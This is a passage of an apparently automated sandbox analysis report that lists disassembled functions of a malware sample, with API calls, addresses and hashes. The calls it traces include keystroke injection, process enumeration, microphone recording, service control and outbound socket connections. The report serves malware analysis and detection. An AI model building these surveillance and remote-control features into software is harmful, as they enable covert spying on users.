                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                                                • String ID:
                                                • API String ID: 3827955099-0
                                                • Opcode ID: 9699b6661a2531067438056e6e17c84c43a50abd6980c9449cbbc3e7b6e8e41f
                                                • Instruction ID: 2c940d2da2653a837d1dd7f7d97b81215891652aa2bafba10f3e04c873c359e3
                                                • Opcode Fuzzy Hash: 9699b6661a2531067438056e6e17c84c43a50abd6980c9449cbbc3e7b6e8e41f
                                                • Instruction Fuzzy Hash: 5C21F42064129076EA2537B26C1EAAF1A1A5BC270970400BFF582BB6F2DD7D4D81975D
                                                Function 0040FFF7 Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410022
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041003A
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410052
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,?,?), ref: 00410067
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,?,?), ref: 0041007A
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410091
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004100A8
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004100BF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputSend
                                                • String ID:
                                                • API String ID: 3431551938-0
                                                • Opcode ID: 1a76d25b3cdd7c893661035fc128670239433febc604796783e0d9c8bd1496aa
                                                • Instruction ID: 8a5223b5b29047144f8416e07a443cadd3070263aba7f0ad688ce4aaf9348b9a
                                                • Opcode Fuzzy Hash: 1a76d25b3cdd7c893661035fc128670239433febc604796783e0d9c8bd1496aa
                                                • Instruction Fuzzy Hash: 713141B1D5120EA9EB11DF949981FFFBFBCAF18304F504026E640B6142D3B44A899BE6
                                                Function 00408F23 Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040937B: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409389
                                                  • Part of subcall function 0040937B: LoadResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 00409394
                                                  • Part of subcall function 0040937B: LockResource.KERNEL32(00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 0040939B
                                                  • Part of subcall function 0040937B: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 004093A6
                                                • malloc.MSVCRT ref: 00408F46
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00408F72
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408F7E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408F87
                                                • malloc.MSVCRT ref: 00408F98
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • free.MSVCRT ref: 00408FE3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408FF1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408FFA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                                • String ID:
                                                • API String ID: 531887698-0
                                                • Opcode ID: c0d659e62792981766755c086100ca441f72e45028c496466d56a8d6ef736a94
                                                • Instruction ID: 0f5b62609c9ab7160e54374dd8f2dd13e38c4702fcd5a151f52b0c56a5937fd1
                                                • Opcode Fuzzy Hash: c0d659e62792981766755c086100ca441f72e45028c496466d56a8d6ef736a94
                                                • Instruction Fuzzy Hash: CD312A75A0010DAFCF04EFA4ED998EEBBB9FB48315F1041A9E906A3290DB356F05DB54
                                                Function 0040D596 Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D59C
                                                • _itoa.MSVCRT ref: 0040D5A3
                                                  • Part of subcall function 004093E2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004093F3
                                                  • Part of subcall function 004093E2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409407
                                                  • Part of subcall function 004093E2: Process32FirstW.KERNEL32(00000000,?), ref: 00409428
                                                  • Part of subcall function 004093E2: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409435
                                                  • Part of subcall function 004093E2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409456
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094D1
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094E1
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094EE
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0), ref: 004094FE
                                                  • Part of subcall function 004093E2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004146D0,00000000), ref: 0040950B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D5C6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D5D0
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D5EA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                                • String ID:
                                                • API String ID: 1707565870-0
                                                • Opcode ID: 4face28eaf6ff0eb16788548de60417d0a5097f14054542bf19cdca52f2a94fe
                                                • Instruction ID: 07d0028aa8ada5f3dcc480a182bb9663aacaae6e203af6db838c213e279ed8e4
                                                • Opcode Fuzzy Hash: 4face28eaf6ff0eb16788548de60417d0a5097f14054542bf19cdca52f2a94fe
                                                • Instruction Fuzzy Hash: 780121729001199BCB14EBA1DD4AAEE7738FB15306F00447AF106E20D1EA389B48CF59
                                                Function 0040DE1B Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DE2F
                                                • atoi.MSVCRT(00000000), ref: 0040DE3C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DE4C
                                                • atoi.MSVCRT(00000000), ref: 0040DE53
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DE62
                                                • atoi.MSVCRT(00000000), ref: 0040DE69
                                                  • Part of subcall function 004013C9: _ftol.MSVCRT ref: 0040142F
                                                  • Part of subcall function 004013C9: waveInOpen.WINMM(00419178,000000FF,004191F8,00401528,00000000,00030008), ref: 00401459
                                                  • Part of subcall function 004013C9: waveInStart.WINMM ref: 00401472
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                                • String ID:
                                                • API String ID: 463581448-0
                                                • Opcode ID: 6d28d9b9ba21ee658b1182ea5ea35368b30efa8681223980126826b427cbd575
                                                • Instruction ID: 92725c326574f6ead67a7d8fd03051f9e57b40fbe86d0bf9ab57b7e358f10fd0
                                                • Opcode Fuzzy Hash: 6d28d9b9ba21ee658b1182ea5ea35368b30efa8681223980126826b427cbd575
                                                • Instruction Fuzzy Hash: 9C014471A001159BDB04BBF1EC5E9FE7768EB50306B0048BEE502E31E0EE7859048B54
                                                Function 00410A4F Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00419288,?,?,?,?,?,?,?,0041056F), ref: 00410A5E
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,0041056F), ref: 00410A6B
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,0041056F), ref: 00410A73
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410A80
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,0041056F), ref: 00410A8F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410AA1
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041056F), ref: 00410AA4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0041056F), ref: 00410AA9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: db27cd96c616ce4678e114e9c54766b2d86c0f1e8179ad45d936c5fbf1742643
                                                • Instruction ID: b69029bf0ec0e393972e793565eb66cbe89d492d466497b744cb5ceaf3125261
                                                • Opcode Fuzzy Hash: db27cd96c616ce4678e114e9c54766b2d86c0f1e8179ad45d936c5fbf1742643
                                                • Instruction Fuzzy Hash: F7F06231540224BFD710AF74AC8CEFF3FACEF59692B004125F902D3195DB649E468AA9
                                                Function 00410B48 Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00419288,?,?,?,?,?,?,?,004104E8), ref: 00410B57
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004104E8), ref: 00410B64
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B6C
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B79
                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004104E8), ref: 00410B88
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B9A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004104E8), ref: 00410B9D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004104E8), ref: 00410BA2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: 902a8f09ee4b1fc8a84915185151f4197eaa66007d3a86b852d8731c97519edf
                                                • Instruction ID: 49de90075d0cc7e98cfb0c102fff2fe0d21623244b77087224835c578392e202
                                                • Opcode Fuzzy Hash: 902a8f09ee4b1fc8a84915185151f4197eaa66007d3a86b852d8731c97519edf
                                                • Instruction Fuzzy Hash: 71F0C871600114BFD700AF74AC89EFF3FACEB08256F004025FA02D3154D7749E428AA9
                                                Function 00410BAF Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00419288,?,?,?,?,?,?,?,00410457), ref: 00410BBE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00410457), ref: 00410BCB
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00410457), ref: 00410BD3
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410BE0
                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00410457), ref: 00410BEF
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410C01
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00410457), ref: 00410C04
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00410457), ref: 00410C09
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: f0befdd2f5e3e2c2769064a6cebd99a09e1ad9aa91ee08ebdf44b5344283a862
                                                • Instruction ID: daae58050849ff11ee2bf19fcdfff762d724f4f04cdb2464a271fb0fda49e823
                                                • Opcode Fuzzy Hash: f0befdd2f5e3e2c2769064a6cebd99a09e1ad9aa91ee08ebdf44b5344283a862
                                                • Instruction Fuzzy Hash: F8F06271600224BFD700AF75EC88EFF3FACEB49656B004125FA06D7154DB789E468AA9
                                                Function 0041146F Relevance: 12.0, APIs: 8, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6C9BB010,?,?,00410EF5,?), ref: 0041147E
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,00410EF5,?), ref: 0041149C
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00410EF5,?), ref: 004114A4
                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,00410EF5,?), ref: 004114AF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,00410EF5,?), ref: 004114B9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114C2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00410EF5,?), ref: 004114D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410EF5,?), ref: 004114DA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                                • String ID:
                                                • API String ID: 1083762089-0
                                                • Opcode ID: 32f5f12b531cbd0cbd753a166e607dad39a2b18f34ffb0a10629212d97c95e66
                                                • Instruction ID: 4b6a9b0f99f3ec694b1fd54bed7ea3cd1bd1d8914a05a2300b273985db0e74d2
                                                • Opcode Fuzzy Hash: 32f5f12b531cbd0cbd753a166e607dad39a2b18f34ffb0a10629212d97c95e66
                                                • Instruction Fuzzy Hash: 8801A27550015EEFCF04EF64EC589EA3B79FB04316B00C164FD2A971A0EB34AA59CB58
                                                Function 00410142 Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410154
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                  • Part of subcall function 004106B8: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004106C8
                                                  • Part of subcall function 004106B8: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 004106E1
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,00000000,?), ref: 0041019F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 004101A9
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 004101BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101D1
                                                  • Part of subcall function 0040209F: CreateThread.KERNEL32(00000000,00000000,004020BE,?,00000000,00000000), ref: 004020B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 004101E6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                                • String ID:
                                                • API String ID: 2339118965-0
                                                • Opcode ID: e35d68d86eefed33068762f96d27e4212e4c55f873384372261b56d4c10a5413
                                                • Instruction ID: e44f525c74eb180ea185d678458459fb690260886d4cfae9058b836792fbce52
                                                • Opcode Fuzzy Hash: e35d68d86eefed33068762f96d27e4212e4c55f873384372261b56d4c10a5413
